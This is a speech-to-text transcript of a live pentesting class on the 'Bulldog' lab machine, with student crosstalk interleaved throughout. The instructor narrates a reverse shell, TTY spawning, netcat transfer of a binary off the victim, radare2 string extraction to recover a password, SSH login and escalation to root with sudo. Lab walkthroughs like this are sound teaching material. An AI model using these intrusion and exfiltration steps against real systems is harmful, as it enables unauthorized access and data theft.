there is Linux and Unix. Okay. Array, bro, I'm actually pasting the reverse shell. No, sorry. Bin bash. Bin sh. It must be. Let me actually paste this, and then I'm going to change it to bin sh. Now I think we messed it up. Array, control Z. Done. The connection is gone. Let us actually redo this. We need to establish the connection again. Okay, we got access. So let us see what are the users here. Let's spawn a TTY shell, but I'm going to copy this. I'm going to edit this one a bit, and then I'm going to paste it. Before I do anything, everything is important. Everything need to be edited. So instead of bash, I'm going to have a sh shell, which is a much advanced shell. So I'm going to copy this because in my computer, it runs Python 3 in my virtual environment. So paste the clipboard and click on enter. So we have a bin sh shell, which means that my shell is more interactive. Okay. So you guys won't understand this right now because these are some advanced concepts. I'm just letting you know because these are the things that you guys will be understanding down the line, and you guys will be doing that. You guys will be doing better than me. Okay. That's the thing I can tell you because you guys will be on practice every day. So once this is done, like ls dash la. So which one is a directory? Bulldog is a directory. Okay. I'm going to go to Bulldog. I'm gonna type ls. I'm gonna type ls dash la. I have like templates URL init setting static. Interesting. Let's go to cd home. We have bulldog admin. Okay. So there is a hidden admin directory. Okay, let's go there.
Dot.
That's the thing I forgot. Dot HID hidden admin. Instead of typing all this, if you know like first four letters and type asterisk, that's it. You can actually go into that directory. ls-la. You're in that hidden admin directory, and there is a note. Let's read that note. It says that okay, I'm working on a backend permission stuff. Okay, it's like a super prototype, but I think it will be working on great. Literally run the app, give your account password, and it will determine if you have access to that file or not. It's great stuff. Once I'm finished with it, the hacker wouldn't be able to reverse it. Keep in mind this is still a prototype right now. I am working with the Django user account. Okay, so we have a user account. A user account might have access to something like the Django. Okay, let's keep this one. Okay, so we know there is a user account and there is an app, and this is a custom permission app. So it has read write permissions, but that is something unusual. So let us actually move this thing to my machine. How do I move that? Forward, come on, this is the thing. This is your time to tell me how I move this.
Okay. NC
Yeah,
IP.
and see,
Bro, first you have to listen on second terminal.
nc dash l. But we already are using port 4444, right? Let's go here and sudo su, and now let's listen to on port 444.
Port and greater than file.
That is
Greater
the
than
thing that you're gonna
redirection
do
sign.
later on, okay? But right now here we need to actually like send the file. How are you gonna send it from here to that particular IP? Hmm.
NC IP.
Perfect. What is the IP
Your
we are
machine's
sending?
IP.
Yeah,
Mm, and
we don't need port.
port port and less than file name.
Less than. You sure?
Yeah. But in your side I guess greater than and file name. You first have to listen. Okay.
What's the
Enter.
IP?
No, bro, you don't have to put here IP on
I need to
victim side.
simply
You have to
listen.
here.
I know that.
Hmm.
And then
Yeah.
what is that one's IP?
No, I guess you don't have to put here IP. Only
You
port.
sure? You sure?
Yes, yes.
Hey. Hmm.
Cut the IP. Cut that
Cut the
IP.
IP and then forward the TXT.
Enter.
What's going on? Why is it not working? You made mistake from the other end. Can you see what happened?
Bro, on now type that command on victim side, which were you typing previously.
What do you mean?
Now you are listening, okay? So on
Yep.
victim side, you have to type the command on
Victim side.
victim
What I
side.
need to do?
On victim side, you have to put NC after it your machine's IP and port and less than yes, same command.
But why is it not going?
And type it again. Previously, you were not listening, I guess. But Bro, first come out from here. You are, I guess.
We are stuck. Yeah. How are you gonna come out from
Yes.
this? See, these are a lot of things that are gonna
Maybe
happen when you're
quit
pen
or
testing.
control C.
Come on, guys. You need to
Hmm.
tell me. Anyone? Can anyone tell
Try
me
quit.
how are you gonna quit? Good, good. If it works, I'll give you chocolate. It's not gonna work. So Control C, Control Z.
Yeah, but I was scared that control C. Yeah,
All good G. Do not
that's
even
why
worry.
I
Yep,
was
yep.
not
I know, I
recommending.
know, I know. Let's go back there. Okay. So
Now
whatever the
same
things that you
command, the
did, you
NC
need to
IP.
do that. Okay, I'm just gonna spawn my shell, brother. Wait, I need to import that my Python shell because I don't want to waste any time. Basically, but one wrong command, you're gonna lose an access to system, and it's gonna create a log in the other system. So this is really, really sensitive. So when you're dealing with this, cd/home slash bull asterisk, I mean the bulldog admin ls-la cd cd.hid asterisk ls-la. See, now we are there. So what are you going to do here while you're doing nmap? Fawaz, when did you become so weak, man? So you're gonna how are you gonna send while you're
Why?
sending what you need to do?
Bro, I was telling the right command. You are now listening. Just type that command NC and your IP.
NC and what is my IP? Listening and what's my IP?
Didn't cut hyphen L, bro. You are not listening. Cut hyphen L,
You said you're listening, man. Come on.
bro. Let me type the command.
No, I'm not gonna give you. No, I'm just kidding. Yep. Come on, tell me what I need to do here.
Yeah, I have sent it the command, proper command, which you have to type on
That's it, bro. That's what the
victim
thing
side.
that we did, but it did not work for some reason. What I'm typing it in my end.
Now you are listening, already listening, so it will be working. You have to first listen, then you have to enter the command on victim side.
I'm
Okay,
listening.
now enter that command on victim side.
Sure.
Enter.
You failed forward again.
Why? Everything is okay.
Everything is okay. Where is the reversal? Where is the file that we did? Hmm? Where is the file? You're listening on this one, but
Hmm.
see, wait. Let us go to Kali directory. See, we have
Empty.
forward, but that is empty. So why the forward is empty?
I guess you didn't specify port for P. While you were listening, you didn't put P.
Here?
NC, yeah, try NC hyphen LVP. Hyphen LVP. Cut port from this side.
Perfect. I'm wondering what mistakes you're doing. See, it failed IP host lookup. So what happened then? Inverse host lookup failed. What happened? On the other end, let's go to other end. Can you properly see if you're sending the file
Bro,
correctly?
cut that IP from the. I guess we have
We
to cut
need the
that
IP, I
IP.
think, if I'm not wrong. Guys, come on, students. What do you think? See, we are
That's
listening,
that's
but while we
perfect. Now try.
if it is
Now
listening here,
try that command on victim side.
we need to close this again. G.
Hmm.
Oh my God, forward. What is wrong with you? We need to run this multiple times. It's not gonna work always, my friend. Yeah. See, you need to see once a mistake, it's a mistake. So we need to like get this thing in the game. So how are you gonna do that? One simple command, we are making a mistake. Come on, where are you making a mistake? Pentesting, who said it's easy? It's not easy. See, we have the custom permission app, and
Yeah,
then
now try
hmm?
NC your machine IP. Previously, I guess we were not specifying port. That's why.
and see.
Your IP, your machine's IP.
Hmm?
Okay, now port on which you are listening. Now less
Okay,
than custom permission app.
sure.
Less than sign. Yes.
Hmm. Custom permission less than. What is the file name that I'm sending?
Custom permission.
We are actually still listening, are we? Yep.
Yes.
But what's the mistake that you're doing forward here? So there is something, okay? Hmm? That is going wrong here. So we need to specify one more parameter. So what is something that you're doing wrong?
You have entered command from victim side.
And what about on the attacker side?
Yeah, entered that command.
That's it. See, you still did a
Yeah,
mistake.
try.
So just go and search for what exactly does a V does. What V does? The V dash V.
V for verbosity.
Hmm?
Verb
NC
browse.
V and no dash V. You need to set a listener here as well, G. I'll show you how this is done. Oh my God, I don't know what's my time as well. It's 3 o'clock in the morning. We are still going. Let's run this. Let's go here. Let's cd slash home cd bull cd. Hmm? Easy. Okay. Fuck. nc nc dash l nemlogon. Here you do not need to type IP here. That's one of the most important thing you guys messed up. copy this, paste the clipboard, and click enter. See, it is listening on this port. Now, while it is listening, we are doing a bit of transfers. Okay. So what is the IP address of that machine? Hmm? Sorry, I need not specify port. 4445. What port we open here on the Bulldog? Yep, it is accepted connection. And let us see if the file that we sent is actually having something. Looks like this file doesn't have anything. Let's actually rerun this command. And we are sending this custom permission app. Crazy shit. Okay, let's go back to our old terminal. The second one. So what are the things you need to do here? That's it. This is the IP and this is where we are getting it from. It's 4445 open. Why is it saying open here? There is an issue here usually. Never happened before when we are doing a Bulldog machine. Perfect. All right. So we got that machine. Perfect. Let us see what we can do. So once we got that, all right. Did you guys know what I did here? Really quick. So I got the file. What I did. So that's an application. So usually, like the very first thing is, I got the file forward here. Okay, from port 4445 you do not need to specify any parameters from the receiving end. Okay, when you're receiving a file, okay, all you need is to type in the IP of the victim and then type in the port from where you want to receive the file and then output it as something like jj.txt, something like it. But when you are sending, you need to set a listener from your end. Okay, you need to set a listener from your end. Okay, because you're actually, like, making sure that the communication happens, and then you're actually sending the file. Okay, the what file you want to send, you will be using a less than command to send it. Simple. See, here you're not using any IP address. This file can be received by anyone if he knows what port you're sending. But if you want to send it to a specific user, you need to specify the IP here, like only this person can accept it. I am like trying to send it to everyone who is actually, like, connecting on port 4445. So what I did is, here I connected on port 4445. So then when I happen to cat, This one is not a text file. It is actually messed up. So what I did is, so I tried to reverse engineer it. Reverse engineering is one of the most important skill as a professional pen tester. So the very first thing is I analyze that program. Okay, I analyze that program using a radar tool. So A means analyze everything. It's gonna like report what exactly are there. So 0x004004 is an entry point. See, these are like really advanced stuff. You do not even need to worry. One day you will be understanding this when you're like learning cybersecurity from scratch. After this, you're gonna go all the way down. Okay, so you're gonna explore all the flags. So once you explore all the flags, these are the main functions. Okay, these are the functions you get. So sys input put, sys system stack check fail, library. This is a system, and then there is a main. So usually in the main function, you will be having all the details. So here, when I check the main function, I got some details here. I don't know what exactly that means. What does that mean? I don't even know. But I got like copy. Okay, I got some important stuff when I reverse engineered it. I'm gonna type everything here. I'm gonna type the strings that I got. Okay. So it says that super ultimate password you can't get. So this is a password for this idiot Django. Where is this guy? Django. How are you gonna connect to Django now? I want you guys to connect to Django. Now you know the Django SSH. Here on port 23, there is telnet, but I'm using SSH here. I'm gonna paste the password and let us see if it worked. Nope, it did not work. The super ultimate password, I did not finish that, right? Let me actually copy that. You can't get. Okay, let me actually paste everything here. Now I'm gonna copy this whole thing. Let us see if we can actually establish a connection here. Bingo, we happen to pawn the system. Pawning means taking control. Now we took control of the target machine. So this is how a real hacker or a real pen tester works. He works through all the processes, he explores everything, he knows how to send files and transfer files, he has a good command line experience. Okay. So this is how a real cybersecurity professional or this is how a real pen tester actually takes control of a target machine. This is how a red teamer tests his systems on an enterprise level. This is not an easy thing. Okay. Once you get access, what you can do? Just go this sudo I. What is the password for this? I got access to root. So unless that's it, guys. This is how you pen test or like you practice pen testing by making a lot of mistakes, by understanding a proper command, and this is how you get a knowledge on exploit development. This is where you like learn a lot of skill like on what is a reverse shell. You guys doesn't even know, you do not even know what a reverse shell is. Reverse shell is like taking control of a um, target machine's terminal or your terminal from the opposite end. Okay, so this whole thing is actually a shell. Okay, this whole thing where we are doing is a shell. Here what we did, here we did reverse engineering. So this is one of the skill that you will be like learning at the end of the day. Reverse engineering is one of the advanced skill as a pen tester you can learn. See, I simply did it because I know I have done a lot of reverse engineering. I played with malwares like since 10 years. Like back in BTech second year, I coded my very first malware. So these are a couple of things that you can learn. And here, see, this is how you can actually transfer a file. Okay, I told you how to transfer a file. I told you how to do uh, I told you how to reverse engineer an application. I mean, you guys won't be understanding this. You guys need to here PDF means print everything. So it's going to give you an output. Main means I'm selecting this main method to see what exactly is inside that. So that's how you're going to do. This is an entry point. You need to find an entry point. So using the art2, art2 is a Reddit, which is a reverse engineering tool that helps you find out an entry point. So anyone having any doubts, let's close this pen testing machine. And this is all done. And so from here, I happen to capture the bulldog, which is in the same environment. And now let's go back here. Let's close bulldog as well. It is done. Nothing to do. Stop this. Power off. Done. Let's actually see what's wrong with this stupid Ubuntu. Probably I need to give them more space or like something. I'm happy to show you the tool as well, but today for some reason it's not getting installed. So what I'll do is I'll get any updates here. It's good to have updates uh, so that you know. So let us see what updates we have. Anyone have any doubts? Because see, I told you much advanced stuff here. If you have doubts, please kindly ask, because see, then only I can tell you what you guys need to do, to increase your skills. Always ask doubts, brothers. Everyone, always ask doubts. Doubts are one of the most important thing. Hmm. Anyone any doubts? Please kindly ask me. Hello, anyone?
Hello, guys.
పెన్ టెస్టింగ్ అంటే ఇట్లా ఉంటుంది సింపుల్ చెప్పాలంటే. వీళ్ళకి ఏం అర్థం కానట్టుంది నాకు తెలిసి. So the last part before getting access to the target machine, okay. So I happen to SSH remotely connect to my target machine using the SSH protocol over the port number 23. Okay. Once I happen to SSH, okay, what I did is simple. I typed in sudo.i. Okay, sudo.i. I can check permissions. So when I check permissions, when I typed in sudo.i to see like who can run commands on which user, so it told me it actually automatically switched it to root. So that's one of the most interesting thing there. So once I switch it to root, I can actually get access to the admin user. Root is a core user. I happen to like move to the root directory and read the flag from there. That's it. That's what I did after I got the access of a target machine.